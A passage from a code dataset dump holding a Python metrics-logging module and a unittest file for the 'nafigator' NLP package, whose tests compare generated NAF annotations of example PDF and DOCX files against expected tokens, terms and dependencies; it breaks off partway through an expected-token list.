| 45.49697 | 178 | 0.519471 | 2,398 | 22,521 | 4.207673 | 0.106756 | 0.042815 | 0.041427 | 0.060258 | 0.769772 | 0.708424 | 0.649752 | 0.614172 | 0.575421 | 0.548365 | 0 | 0.027724 | 0.380179 | 22,521 | 494 | 179 | 45.589069 | 0.695107 | 0.058967 | 0 | 0.534759 | 0 | 0 | 0.165035 | 0.040148 | 0.010695 | 0 | 0 | 0 | 0 | 1 | 0.002674 | false | 0 | 0.02139 | 0 | 0.024064 | 0.096257 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fcd5f55bb1f89d31cd3d25738bba5c23139e9aa7 | 1,978 | py | Python | Logger/Logger.py | ArthMx/Logger | 0fab4009abec00f33d9b93d0c6093e544e5168b8 | [
"MIT"
] | null | null | null | Logger/Logger.py | ArthMx/Logger | 0fab4009abec00f33d9b93d0c6093e544e5168b8 | [
"MIT"
] | null | null | null | Logger/Logger.py | ArthMx/Logger | 0fab4009abec00f33d9b93d0c6093e544e5168b8 | [
"MIT"
] | null | null | null | import pandas as pd
import time
import sys
class AverageMeter(object):
"""Sum values to compute the mean."""
def __init__(self):
self.reset()
def reset(self):
self.count = 0
self.sum = 0
def update(self, val):
self.count += 1
self.sum += val
def average(self):
return self.sum / self.count
class MetricsLogger(object):
"""Track the values of different metrics, display their average values and save them
in a log file."""
def __init__(self):
self.log_df = pd.DataFrame()
self.n = 0
self.reset()
def reset(self):
"""Reset the metrics average meters."""
# Save last epoch average value of metrics (unless it's the first epoch)
if self.n > 0:
self.log_df = self.log_df.append(self._average(), ignore_index=True)
self.n += 1
self.avgmeters = {}
self.last_update = time.time()
def update(self, values, show=True):
"""Update metrics values and display their current average if show is True."""
for key in values:
if key not in self.avgmeters:
self.avgmeters[key] = AverageMeter()
self.avgmeters[key].update(values[key])
if show:
self._show()
def save_log(self, path):
"""Save log dataframe to path."""
self.log_df.to_csv(path, index=False)
def _average(self):
return {key: self.avgmeters[key].average() for key in self.avgmeters}
def __str__(self):
avg = self._average()
str_list = [key + ": %.4f" % round(avg[key], 4) for key in avg]
return (" - ").join(str_list)
def _show(self, t_thresh=0.1):
t_now = time.time()
if t_now - self.last_update >= t_thresh:
sys.stdout.write("\r" + str(self))
sys.stdout.flush()
self.last_update = t_now
| 29.969697 | 88 | 0.557634 | 258 | 1,978 | 4.143411 | 0.310078 | 0.072965 | 0.033676 | 0.028064 | 0.039289 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007513 | 0.327098 | 1,978 | 65 | 89 | 30.430769 | 0.795642 | 0.169363 | 0 | 0.130435 | 0 | 0 | 0.00682 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.23913 | false | 0 | 0.065217 | 0.043478 | 0.413043 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fcdad0563564da691ff6918e2c18e8483c8a38b4 | 69,814 | py | Python | tests/test_nafigator.py | DeNederlandscheBank/nafigator | 02f8bf4e0962430429cc2c4fdfc79d2d90a16363 | [
"MIT"
] | 1 | 2022-01-17T14:41:25.000Z | 2022-01-17T14:41:25.000Z | tests/test_nafigator.py | DeNederlandscheBank/nafigator | 02f8bf4e0962430429cc2c4fdfc79d2d90a16363 | [
"MIT"
] | 3 | 2021-11-03T14:53:25.000Z | 2022-02-22T13:21:13.000Z | tests/test_nafigator.py | DeNederlandscheBank/nafigator | 02f8bf4e0962430429cc2c4fdfc79d2d90a16363 | [
"MIT"
] | 1 | 2021-11-17T10:48:19.000Z | 2021-11-17T10:48:19.000Z | #!/usr/bin/env python
"""Tests for `nafigator` package."""
import unittest
unittest.TestLoader.sortTestMethodsUsing = None
from deepdiff import DeepDiff
from click.testing import CliRunner
from nafigator import NafDocument, parse2naf
from os.path import join
class TestNafigator_pdf(unittest.TestCase):
"""Tests for `nafigator` package."""
def test_1_pdf_generate_naf(self):
""" """
tree = parse2naf.generate_naf(
input=join("tests", "tests", "example.pdf"),
engine="stanza",
language="en",
naf_version="v3.1",
dtd_validation=False,
params={},
nlp=None,
)
assert tree.write(join("tests", "tests", "example.naf.xml")) == None
def test_1_split_pre_linguistic(self):
""" """
# only save the preprocess steps
tree = parse2naf.generate_naf(
input=join("tests", "tests", "example.pdf"),
engine="stanza",
language="en",
naf_version="v3.1",
dtd_validation=False,
params={'linguistic_layers': []},
nlp=None,
)
tree.write(join("tests", "tests", "example_preprocess.naf.xml")) == None
# start with saved document and process linguistic steps
naf = NafDocument().open(join("tests", "tests", "example_preprocess.naf.xml"))
tree = parse2naf.generate_naf(
input=naf,
engine="stanza",
language="en",
naf_version="v3.1",
params = {'preprocess_layers': []}
)
doc = NafDocument().open(join("tests", "tests", "example.naf.xml"))
assert tree.raw == doc.raw
def test_2_pdf_header_filedesc(self):
""" """
naf = NafDocument().open(join("tests", "tests", "example.naf.xml"))
actual = naf.header["fileDesc"]
expected = {
"filename": "tests\\tests\\example.pdf",
"filetype": "application/pdf",
}
assert actual["filename"] == expected["filename"]
assert actual["filetype"] == expected["filetype"]
def test_3_pdf_header_public(self):
""" """
naf = NafDocument().open(join("tests", "tests", "example.naf.xml"))
actual = naf.header["public"]
expected = {
"{http://purl.org/dc/elements/1.1/}uri": "tests\\tests\\example.pdf",
"{http://purl.org/dc/elements/1.1/}format": "application/pdf",
}
assert actual == expected, (
"expected: " + str(expected) + ", actual: " + str(actual)
)
# def test_4_pdf_header_linguistic_processors(self):
# naf = NafDocument().open(join("tests", "tests", "example.naf.xml"))
# actual = naf.header['linguisticProcessors']
# expected = [{'layer': 'pdftoxml', 'lps':
# [{'name': 'pdfminer-pdf2xml',
# 'version': 'pdfminer_version-20200124',
# 'beginTimestamp': '2021-05-05T13:25:16UTC',
# 'endTimestamp': '2021-05-05T13:25:16UTC'}]},
# {'layer': 'pdftotext', 'lps':
# [{'name': 'pdfminer-pdf2text',
# 'version': 'pdfminer_version-20200124',
# 'beginTimestamp': '2021-05-05T13:25:16UTC',
# 'endTimestamp': '2021-05-05T13:25:16UTC'}]},
# {'layer': 'formats', 'lps':
# [{'name': 'stanza-model_en',
# 'version': 'stanza_version-1.2',
# 'beginTimestamp': '2021-05-05T13:25:18UTC',
# 'endTimestamp': '2021-05-05T13:25:18UTC'}]},
# {'layer': 'entities', 'lps':
# [{'name': 'stanza-model_en',
# 'version': 'stanza_version-1.2',
# 'beginTimestamp': '2021-05-05T13:25:18UTC',
# 'endTimestamp': '2021-05-05T13:25:18UTC'}]},
# {'layer': 'text', 'lps':
# [{'name': 'stanza-model_en',
# 'version': 'stanza_version-1.2',
# 'beginTimestamp': '2021-05-05T13:25:18UTC',
# 'endTimestamp': '2021-05-05T13:25:18UTC'}]},
# {'layer': 'terms', 'lps':
# [{'name': 'stanza-model_en',
# 'version': 'stanza_version-1.2',
# 'beginTimestamp': '2021-05-05T13:25:18UTC',
# 'endTimestamp': '2021-05-05T13:25:18UTC'}]},
# {'layer': 'deps', 'lps':
# [{'name': 'stanza-model_en',
# 'version': 'stanza_version-1.2',
# 'beginTimestamp': '2021-05-05T13:25:18UTC',
# 'endTimestamp': '2021-05-05T13:25:18UTC'}]},
# {'layer': 'multiwords', 'lps':
# [{'name': 'stanza-model_en',
# 'version': 'stanza_version-1.2',
# 'beginTimestamp': '2021-05-05T13:25:18UTC',
# 'endTimestamp': '2021-05-05T13:25:18UTC'}]},
# {'layer': 'raw', 'lps':
# [{'name': 'stanza-model_en',
# 'version': 'stanza_version-1.2',
# 'beginTimestamp': '2021-05-05T13:25:18UTC',
# 'endTimestamp': '2021-05-05T13:25:18UTC'}]}]
# assert actual == expected, "expected: "+str(expected)+", actual: "+str(actual)
def test_5_pdf_formats(self):
naf = NafDocument().open(join("tests", "tests", "example.naf.xml"))
actual = naf.formats
expected = [
{
"length": "268",
"offset": "0",
"textboxes": [
{
"textlines": [
{
"texts": [
{
"font": "CIDFont+F1",
"size": "12.000",
"length": "87",
"offset": "0",
"text": "The Nafigator package allows you to store NLP output from custom made spaCy and stanza ",
}
]
},
{
"texts": [
{
"font": "CIDFont+F1",
"size": "12.000",
"length": "77",
"offset": "88",
"text": "pipelines with (intermediate) results and all processing steps in one format.",
}
]
},
]
},
{
"textlines": [
{
"texts": [
{
"font": "CIDFont+F1",
"size": "12.000",
"length": "86",
"offset": "167",
"text": "Multiwords like in “we have set that out below” are recognized (depending on your NLP ",
}
]
},
{
"texts": [
{
"font": "CIDFont+F1",
"size": "12.000",
"length": "11",
"offset": "254",
"text": "processor).",
}
]
},
]
},
],
"figures": [],
"headers": [],
}
]
assert actual == expected, (
"expected: " + str(expected) + ", actual: " + str(actual)
)
def test_6_pdf_entities(self):
naf = NafDocument().open(join("tests", "tests", "example.naf.xml"))
actual = naf.entities
expected = [
{
"id": "e1",
"type": "PRODUCT",
"text": "Nafigator",
"span": [{"id": "t2"}],
},
{"id": "e2", "type": "CARDINAL", "text": "one", "span": [{"id": "t28"}]},
]
assert actual == expected, (
"expected: " + str(expected) + ", actual: " + str(actual)
)
def test_7_pdf_text(self):
naf = NafDocument().open(join("tests", "tests", "example.naf.xml"))
actual = naf.text
expected = [
{
"text": "The",
"page": "1",
"para": "1",
"sent": "1",
"id": "w1",
"length": "3",
"offset": "0",
},
{
"text": "Nafigator",
"page": "1",
"para": "1",
"sent": "1",
"id": "w2",
"length": "9",
"offset": "4",
},
{
"text": "package",
"page": "1",
"para": "1",
"sent": "1",
"id": "w3",
"length": "7",
"offset": "14",
},
{
"text": "allows",
"page": "1",
"para": "1",
"sent": "1",
"id": "w4",
"length": "6",
"offset": "22",
},
{
"text": "you",
"page": "1",
"para": "1",
"sent": "1",
"id": "w5",
"length": "3",
"offset": "29",
},
{
"text": "to",
"page": "1",
"para": "1",
"sent": "1",
"id": "w6",
"length": "2",
"offset": "33",
},
{
"text": "store",
"page": "1",
"para": "1",
"sent": "1",
"id": "w7",
"length": "5",
"offset": "36",
},
{
"text": "NLP",
"page": "1",
"para": "1",
"sent": "1",
"id": "w8",
"length": "3",
"offset": "42",
},
{
"text": "output",
"page": "1",
"para": "1",
"sent": "1",
"id": "w9",
"length": "6",
"offset": "46",
},
{
"text": "from",
"page": "1",
"para": "1",
"sent": "1",
"id": "w10",
"length": "4",
"offset": "53",
},
{
"text": "custom",
"page": "1",
"para": "1",
"sent": "1",
"id": "w11",
"length": "6",
"offset": "58",
},
{
"text": "made",
"page": "1",
"para": "1",
"sent": "1",
"id": "w12",
"length": "4",
"offset": "65",
},
{
"text": "spa",
"page": "1",
"para": "1",
"sent": "1",
"id": "w13",
"length": "3",
"offset": "70",
},
{
"text": "Cy",
"page": "1",
"para": "1",
"sent": "2",
"id": "w14",
"length": "2",
"offset": "73",
},
{
"text": "and",
"page": "1",
"para": "1",
"sent": "2",
"id": "w15",
"length": "3",
"offset": "76",
},
{
"text": "stanza",
"page": "1",
"para": "1",
"sent": "2",
"id": "w16",
"length": "6",
"offset": "80",
},
{
"text": "pipelines",
"page": "1",
"para": "1",
"sent": "2",
"id": "w17",
"length": "9",
"offset": "88",
},
{
"text": "with",
"page": "1",
"para": "1",
"sent": "2",
"id": "w18",
"length": "4",
"offset": "98",
},
{
"text": "(",
"page": "1",
"para": "1",
"sent": "2",
"id": "w19",
"length": "1",
"offset": "103",
},
{
"text": "intermediate",
"page": "1",
"para": "1",
"sent": "2",
"id": "w20",
"length": "12",
"offset": "104",
},
{
"text": ")",
"page": "1",
"para": "1",
"sent": "2",
"id": "w21",
"length": "1",
"offset": "116",
},
{
"text": "results",
"page": "1",
"para": "1",
"sent": "2",
"id": "w22",
"length": "7",
"offset": "118",
},
{
"text": "and",
"page": "1",
"para": "1",
"sent": "2",
"id": "w23",
"length": "3",
"offset": "126",
},
{
"text": "all",
"page": "1",
"para": "1",
"sent": "2",
"id": "w24",
"length": "3",
"offset": "130",
},
{
"text": "processing",
"page": "1",
"para": "1",
"sent": "2",
"id": "w25",
"length": "10",
"offset": "134",
},
{
"text": "steps",
"page": "1",
"para": "1",
"sent": "2",
"id": "w26",
"length": "5",
"offset": "145",
},
{
"text": "in",
"page": "1",
"para": "1",
"sent": "2",
"id": "w27",
"length": "2",
"offset": "151",
},
{
"text": "one",
"page": "1",
"para": "1",
"sent": "2",
"id": "w28",
"length": "3",
"offset": "154",
},
{
"text": "format",
"page": "1",
"para": "1",
"sent": "2",
"id": "w29",
"length": "6",
"offset": "158",
},
{
"text": ".",
"page": "1",
"para": "1",
"sent": "2",
"id": "w30",
"length": "1",
"offset": "164",
},
{
"text": "Multiwords",
"page": "1",
"para": "2",
"sent": "3",
"id": "w31",
"length": "10",
"offset": "167",
},
{
"text": "like",
"page": "1",
"para": "2",
"sent": "3",
"id": "w32",
"length": "4",
"offset": "178",
},
{
"text": "in",
"page": "1",
"para": "2",
"sent": "3",
"id": "w33",
"length": "2",
"offset": "183",
},
{
"text": "“",
"page": "1",
"para": "2",
"sent": "3",
"id": "w34",
"length": "1",
"offset": "186",
},
{
"text": "we",
"page": "1",
"para": "2",
"sent": "3",
"id": "w35",
"length": "2",
"offset": "187",
},
{
"text": "have",
"page": "1",
"para": "2",
"sent": "3",
"id": "w36",
"length": "4",
"offset": "190",
},
{
"text": "set",
"page": "1",
"para": "2",
"sent": "3",
"id": "w37",
"length": "3",
"offset": "195",
},
{
"text": "that",
"page": "1",
"para": "2",
"sent": "3",
"id": "w38",
"length": "4",
"offset": "199",
},
{
"text": "out",
"page": "1",
"para": "2",
"sent": "3",
"id": "w39",
"length": "3",
"offset": "204",
},
{
"text": "below",
"page": "1",
"para": "2",
"sent": "3",
"id": "w40",
"length": "5",
"offset": "208",
},
{
"text": "”",
"page": "1",
"para": "2",
"sent": "3",
"id": "w41",
"length": "1",
"offset": "213",
},
{
"text": "are",
"page": "1",
"para": "2",
"sent": "3",
"id": "w42",
"length": "3",
"offset": "215",
},
{
"text": "recognized",
"page": "1",
"para": "2",
"sent": "3",
"id": "w43",
"length": "10",
"offset": "219",
},
{
"text": "(",
"page": "1",
"para": "2",
"sent": "3",
"id": "w44",
"length": "1",
"offset": "230",
},
{
"text": "depending",
"page": "1",
"para": "2",
"sent": "3",
"id": "w45",
"length": "9",
"offset": "231",
},
{
"text": "on",
"page": "1",
"para": "2",
"sent": "3",
"id": "w46",
"length": "2",
"offset": "241",
},
{
"text": "your",
"page": "1",
"para": "2",
"sent": "3",
"id": "w47",
"length": "4",
"offset": "244",
},
{
"text": "NLP",
"page": "1",
"para": "2",
"sent": "3",
"id": "w48",
"length": "3",
"offset": "249",
},
{
"text": "processor",
"page": "1",
"para": "2",
"sent": "3",
"id": "w49",
"length": "9",
"offset": "254",
},
{
"text": ")",
"page": "1",
"para": "2",
"sent": "3",
"id": "w50",
"length": "1",
"offset": "263",
},
{
"text": ".",
"page": "1",
"para": "2",
"sent": "3",
"id": "w51",
"length": "1",
"offset": "264",
},
]
diff = DeepDiff(actual, expected)
assert diff == dict(), diff
def test_8_pdf_terms(self):
naf = NafDocument().open(join("tests", "tests", "example.naf.xml"))
actual = naf.terms
expected = [
{
"id": "t1",
"lemma": "the",
"pos": "DET",
"type": "open",
"morphofeat": "Definite=Def|PronType=Art",
"span": [{"id": "w1"}],
},
{
"id": "t2",
"lemma": "Nafigator",
"pos": "PROPN",
"type": "open",
"morphofeat": "Number=Sing",
"span": [{"id": "w2"}],
},
{
"id": "t3",
"lemma": "package",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Sing",
"span": [{"id": "w3"}],
},
{
"id": "t4",
"lemma": "allow",
"pos": "VERB",
"type": "open",
"morphofeat": "Mood=Ind|Number=Sing|Person=3|Tense=Pres|VerbForm=Fin",
"span": [{"id": "w4"}],
},
{
"id": "t5",
"lemma": "you",
"pos": "PRON",
"type": "open",
"morphofeat": "Case=Acc|Person=2|PronType=Prs",
"span": [{"id": "w5"}],
},
{
"id": "t6",
"lemma": "to",
"pos": "PART",
"type": "open",
"span": [{"id": "w6"}],
},
{
"id": "t7",
"lemma": "store",
"pos": "VERB",
"type": "open",
"morphofeat": "VerbForm=Inf",
"span": [{"id": "w7"}],
},
{
"id": "t8",
"lemma": "nlp",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Sing",
"span": [{"id": "w8"}],
},
{
"id": "t9",
"lemma": "output",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Sing",
"span": [{"id": "w9"}],
},
{
"id": "t10",
"lemma": "from",
"pos": "ADP",
"type": "open",
"span": [{"id": "w10"}],
},
{
"id": "t11",
"lemma": "custom",
"pos": "ADJ",
"type": "open",
"morphofeat": "Degree=Pos",
"span": [{"id": "w11"}],
},
{
"id": "t12",
"lemma": "make",
"pos": "VERB",
"type": "open",
"morphofeat": "Tense=Past|VerbForm=Part",
"span": [{"id": "w12"}],
},
{
"id": "t13",
"lemma": "spa",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Sing",
"span": [{"id": "w13"}],
},
{
"id": "t14",
"lemma": "cy",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Sing",
"span": [{"id": "w14"}],
},
{
"id": "t15",
"lemma": "and",
"pos": "CCONJ",
"type": "open",
"span": [{"id": "w15"}],
},
{
"id": "t16",
"lemma": "stanza",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Sing",
"span": [{"id": "w16"}],
},
{
"id": "t17",
"lemma": "pipeline",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Plur",
"span": [{"id": "w17"}],
},
{
"id": "t18",
"lemma": "with",
"pos": "ADP",
"type": "open",
"span": [{"id": "w18"}],
},
{
"id": "t19",
"lemma": "(",
"pos": "PUNCT",
"type": "open",
"span": [{"id": "w19"}],
},
{
"id": "t20",
"lemma": "intermediate",
"pos": "ADJ",
"type": "open",
"morphofeat": "Degree=Pos",
"span": [{"id": "w20"}],
},
{
"id": "t21",
"lemma": ")",
"pos": "PUNCT",
"type": "open",
"span": [{"id": "w21"}],
},
{
"id": "t22",
"lemma": "result",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Plur",
"span": [{"id": "w22"}],
},
{
"id": "t23",
"lemma": "and",
"pos": "CCONJ",
"type": "open",
"span": [{"id": "w23"}],
},
{
"id": "t24",
"lemma": "all",
"pos": "DET",
"type": "open",
"span": [{"id": "w24"}],
},
{
"id": "t25",
"lemma": "processing",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Sing",
"span": [{"id": "w25"}],
},
{
"id": "t26",
"lemma": "step",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Plur",
"span": [{"id": "w26"}],
},
{
"id": "t27",
"lemma": "in",
"pos": "ADP",
"type": "open",
"span": [{"id": "w27"}],
},
{
"id": "t28",
"lemma": "one",
"pos": "NUM",
"type": "open",
"morphofeat": "NumType=Card",
"span": [{"id": "w28"}],
},
{
"id": "t29",
"lemma": "format",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Sing",
"span": [{"id": "w29"}],
},
{
"id": "t30",
"lemma": ".",
"pos": "PUNCT",
"type": "open",
"span": [{"id": "w30"}],
},
{
"id": "t31",
"lemma": "multiword",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Plur",
"span": [{"id": "w31"}],
},
{
"id": "t32",
"lemma": "like",
"pos": "ADP",
"type": "open",
"span": [{"id": "w32"}],
},
{
"id": "t33",
"lemma": "in",
"pos": "ADP",
"type": "open",
"span": [{"id": "w33"}],
},
{
"id": "t34",
"lemma": '"',
"pos": "PUNCT",
"type": "open",
"span": [{"id": "w34"}],
},
{
"id": "t35",
"lemma": "we",
"pos": "PRON",
"type": "open",
"morphofeat": "Case=Nom|Number=Plur|Person=1|PronType=Prs",
"span": [{"id": "w35"}],
},
{
"id": "t36",
"lemma": "have",
"pos": "AUX",
"type": "open",
"morphofeat": "Mood=Ind|Tense=Pres|VerbForm=Fin",
"span": [{"id": "w36"}],
},
{
"id": "t37",
"lemma": "set",
"pos": "VERB",
"type": "open",
"morphofeat": "Tense=Past|VerbForm=Part",
"component_of": "mw1",
"span": [{"id": "w37"}],
},
{
"id": "t38",
"lemma": "that",
"pos": "SCONJ",
"type": "open",
"span": [{"id": "w38"}],
},
{
"id": "t39",
"lemma": "out",
"pos": "ADP",
"type": "open",
"component_of": "mw1",
"span": [{"id": "w39"}],
},
{
"id": "t40",
"lemma": "below",
"pos": "ADV",
"type": "open",
"span": [{"id": "w40"}],
},
{
"id": "t41",
"lemma": '"',
"pos": "PUNCT",
"type": "open",
"span": [{"id": "w41"}],
},
{
"id": "t42",
"lemma": "be",
"pos": "AUX",
"type": "open",
"morphofeat": "Mood=Ind|Tense=Pres|VerbForm=Fin",
"span": [{"id": "w42"}],
},
{
"id": "t43",
"lemma": "recognize",
"pos": "VERB",
"type": "open",
"morphofeat": "Tense=Past|VerbForm=Part|Voice=Pass",
"span": [{"id": "w43"}],
},
{
"id": "t44",
"lemma": "(",
"pos": "PUNCT",
"type": "open",
"span": [{"id": "w44"}],
},
{
"id": "t45",
"lemma": "depend",
"pos": "VERB",
"type": "open",
"morphofeat": "VerbForm=Ger",
"span": [{"id": "w45"}],
},
{
"id": "t46",
"lemma": "on",
"pos": "ADP",
"type": "open",
"span": [{"id": "w46"}],
},
{
"id": "t47",
"lemma": "you",
"pos": "PRON",
"type": "open",
"morphofeat": "Person=2|Poss=Yes|PronType=Prs",
"span": [{"id": "w47"}],
},
{
"id": "t48",
"lemma": "nlp",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Sing",
"span": [{"id": "w48"}],
},
{
"id": "t49",
"lemma": "processor",
"pos": "NOUN",
"type": "open",
"morphofeat": "Number=Sing",
"span": [{"id": "w49"}],
},
{
"id": "t50",
"lemma": ")",
"pos": "PUNCT",
"type": "open",
"span": [{"id": "w50"}],
},
{
"id": "t51",
"lemma": ".",
"pos": "PUNCT",
"type": "open",
"span": [{"id": "w51"}],
},
]
assert actual == expected, (
"expected: " + str(expected) + ", actual: " + str(actual)
)
def test_9_pdf_dependencies(self):
naf = NafDocument().open(join("tests", "tests", "example.naf.xml"))
actual = naf.deps
expected = [
{"from_term": "t3", "to_term": "t1", "rfunc": "det"},
{"from_term": "t4", "to_term": "t3", "rfunc": "nsubj"},
{"from_term": "t3", "to_term": "t2", "rfunc": "compound"},
{"from_term": "t4", "to_term": "t5", "rfunc": "obj"},
{"from_term": "t7", "to_term": "t6", "rfunc": "mark"},
{"from_term": "t4", "to_term": "t7", "rfunc": "xcomp"},
{"from_term": "t9", "to_term": "t8", "rfunc": "compound"},
{"from_term": "t7", "to_term": "t9", "rfunc": "obj"},
{"from_term": "t13", "to_term": "t10", "rfunc": "case"},
{"from_term": "t7", "to_term": "t13", "rfunc": "obl"},
{"from_term": "t12", "to_term": "t11", "rfunc": "compound"},
{"from_term": "t13", "to_term": "t12", "rfunc": "amod"},
{"from_term": "t17", "to_term": "t14", "rfunc": "compound"},
{"from_term": "t16", "to_term": "t15", "rfunc": "cc"},
{"from_term": "t14", "to_term": "t16", "rfunc": "conj"},
{"from_term": "t22", "to_term": "t18", "rfunc": "case"},
{"from_term": "t17", "to_term": "t22", "rfunc": "nmod"},
{"from_term": "t22", "to_term": "t19", "rfunc": "punct"},
{"from_term": "t22", "to_term": "t20", "rfunc": "amod"},
{"from_term": "t22", "to_term": "t21", "rfunc": "punct"},
{"from_term": "t26", "to_term": "t23", "rfunc": "cc"},
{"from_term": "t22", "to_term": "t26", "rfunc": "conj"},
{"from_term": "t26", "to_term": "t24", "rfunc": "det"},
{"from_term": "t26", "to_term": "t25", "rfunc": "compound"},
{"from_term": "t29", "to_term": "t27", "rfunc": "case"},
{"from_term": "t26", "to_term": "t29", "rfunc": "nmod"},
{"from_term": "t29", "to_term": "t28", "rfunc": "nummod"},
{"from_term": "t17", "to_term": "t30", "rfunc": "punct"},
{"from_term": "t37", "to_term": "t32", "rfunc": "mark"},
{"from_term": "t31", "to_term": "t37", "rfunc": "acl"},
{"from_term": "t37", "to_term": "t33", "rfunc": "mark"},
{"from_term": "t37", "to_term": "t34", "rfunc": "punct"},
{"from_term": "t37", "to_term": "t35", "rfunc": "nsubj"},
{"from_term": "t37", "to_term": "t36", "rfunc": "aux"},
{"from_term": "t43", "to_term": "t38", "rfunc": "mark"},
{"from_term": "t37", "to_term": "t43", "rfunc": "ccomp"},
{"from_term": "t37", "to_term": "t39", "rfunc": "compound:prt"},
{"from_term": "t37", "to_term": "t40", "rfunc": "advmod"},
{"from_term": "t37", "to_term": "t41", "rfunc": "punct"},
{"from_term": "t43", "to_term": "t42", "rfunc": "aux:pass"},
{"from_term": "t49", "to_term": "t44", "rfunc": "punct"},
{"from_term": "t43", "to_term": "t49", "rfunc": "obl"},
{"from_term": "t49", "to_term": "t45", "rfunc": "case"},
{"from_term": "t49", "to_term": "t46", "rfunc": "case"},
{"from_term": "t49", "to_term": "t47", "rfunc": "nmod:poss"},
{"from_term": "t49", "to_term": "t48", "rfunc": "compound"},
{"from_term": "t49", "to_term": "t50", "rfunc": "punct"},
{"from_term": "t43", "to_term": "t51", "rfunc": "punct"},
]
assert actual == expected, (
"expected: " + str(expected) + ", actual: " + str(actual)
)
def test_10_pdf_multiwords(self):
naf = NafDocument().open(join("tests", "tests", "example.naf.xml"))
actual = naf.multiwords
expected = [
{
"id": "mw1",
"lemma": "set_out",
"pos": "VERB",
"type": "phrasal",
"components": [
{"id": "mw1.c1", "span": [{"id": "t37"}]},
{"id": "mw1.c2", "span": [{"id": "t39"}]},
],
}
]
assert actual == expected, (
"expected: " + str(expected) + ", actual: " + str(actual)
)
def test_11_raw(self):
naf = NafDocument().open(join("tests", "tests", "example.naf.xml"))
actual = naf.raw
expected = "The Nafigator package allows you to store NLP output from custom made spaCy and stanza pipelines with (intermediate) results and all processing steps in one format. Multiwords like in “we have set that out below” are recognized (depending on your NLP processor)."
assert actual == expected, (
"expected: " + str(expected) + ", actual: " + str(actual)
)
# def test_command_line_interface(self):
# """Test the CLI."""
# runner = CliRunner()
# result = runner.invoke(cli.main)
# assert result.exit_code == 0
# # assert 'nafigator.cli.main' in result.output
# help_result = runner.invoke(cli.main, ['--help'])
# assert help_result.exit_code == 0
# assert '--help Show this message and exit.' in help_result.output
class TestNafigator_docx(unittest.TestCase):
def test_1_docx_generate_naf(self):
""" """
tree = parse2naf.generate_naf(
input=join("tests", "tests", "example.docx"),
engine="stanza",
language="en",
naf_version="v3.1",
dtd_validation=False,
params={},
nlp=None,
)
assert tree.write(join("tests", "tests", "example.docx.naf.xml")) == None
def test_2_docx_header_filedesc(self):
""" """
naf = NafDocument().open(join("tests", "tests", "example.docx.naf.xml"))
actual = naf.header["fileDesc"]
expected = {
"filename": "tests\\tests\\example.docx",
"filetype": "application/vnd.openxmlformats-officedocument.wordprocessingml.document",
}
assert actual["filename"] == expected["filename"]
assert actual["filetype"] == expected["filetype"]
def test_3_docx_header_public(self):
""" """
naf = NafDocument().open(join("tests", "tests", "example.docx.naf.xml"))
actual = naf.header["public"]
expected = {
"{http://purl.org/dc/elements/1.1/}uri": "tests\\tests\\example.docx",
"{http://purl.org/dc/elements/1.1/}format": "application/vnd.openxmlformats-officedocument.wordprocessingml.document",
}
assert actual == expected, (
"expected: " + str(expected) + ", actual: " + str(actual)
)
# def test_5_formats(self):
# assert actual == expected
def test_6_docx_entities(self):
naf = NafDocument().open(join("tests", "tests", "example.docx.naf.xml"))
actual = naf.entities
expected = [
{
"id": "e1",
"type": "PRODUCT",
"text": "Nafigator",
"span": [{"id": "t2"}],
},
{"id": "e2", "type": "PRODUCT", "text": "Spacy", "span": [{"id": "t13"}]},
{"id": "e3", "type": "CARDINAL", "text": "one", "span": [{"id": "t27"}]},
]
assert actual == expected, (
"expected: " + str(expected) + ", actual: " + str(actual)
)
def test_7_docx_text(self):
naf = NafDocument().open(join("tests", "tests", "example.docx.naf.xml"))
actual = naf.text
expected = [
{
"text": "The",
"id": "w1",
"sent": "1",
"para": "1",
"page": "1",
"offset": "0",
"length": "3",
},
{
"text": "Nafigator",
"id": "w2",
"sent": "1",
"para": "1",
"page": "1",
"offset": "4",
"length": "9",
},
{
"text": "package",
"id": "w3",
"sent": "1",
"para": "1",
"page": "1",
"offset": "14",
"length": "7",
},
{
"text": "allows",
"id": "w4",
"sent": "1",
"para": "1",
"page": "1",
"offset": "22",
"length": "6",
},
{
"text": "you",
"id": "w5",
"sent": "1",
"para": "1",
"page": "1",
"offset": "29",
"length": "3",
},
{
"text": "to",
"id": "w6",
"sent": "1",
"para": "1",
"page": "1",
"offset": "33",
"length": "2",
},
{
"text": "store",
"id": "w7",
"sent": "1",
"para": "1",
"page": "1",
"offset": "36",
"length": "5",
},
{
"text": "NLP",
"id": "w8",
"sent": "1",
"para": "1",
"page": "1",
"offset": "42",
"length": "3",
},
{
"text": "output",
"id": "w9",
"sent": "1",
"para": "1",
"page": "1",
"offset": "46",
"length": "6",
},
{
"text": "from",
"id": "w10",
"sent": "1",
"para": "1",
"page": "1",
"offset": "53",
"length": "4",
},
{
"text": "custom",
"id": "w11",
"sent": "1",
"para": "1",
"page": "1",
"offset": "58",
"length": "6",
},
{
"text": "made",
"id": "w12",
"sent": "1",
"para": "1",
"page": "1",
"offset": "65",
"length": "4",
},
{
"text": "Spacy",
"id": "w13",
"sent": "1",
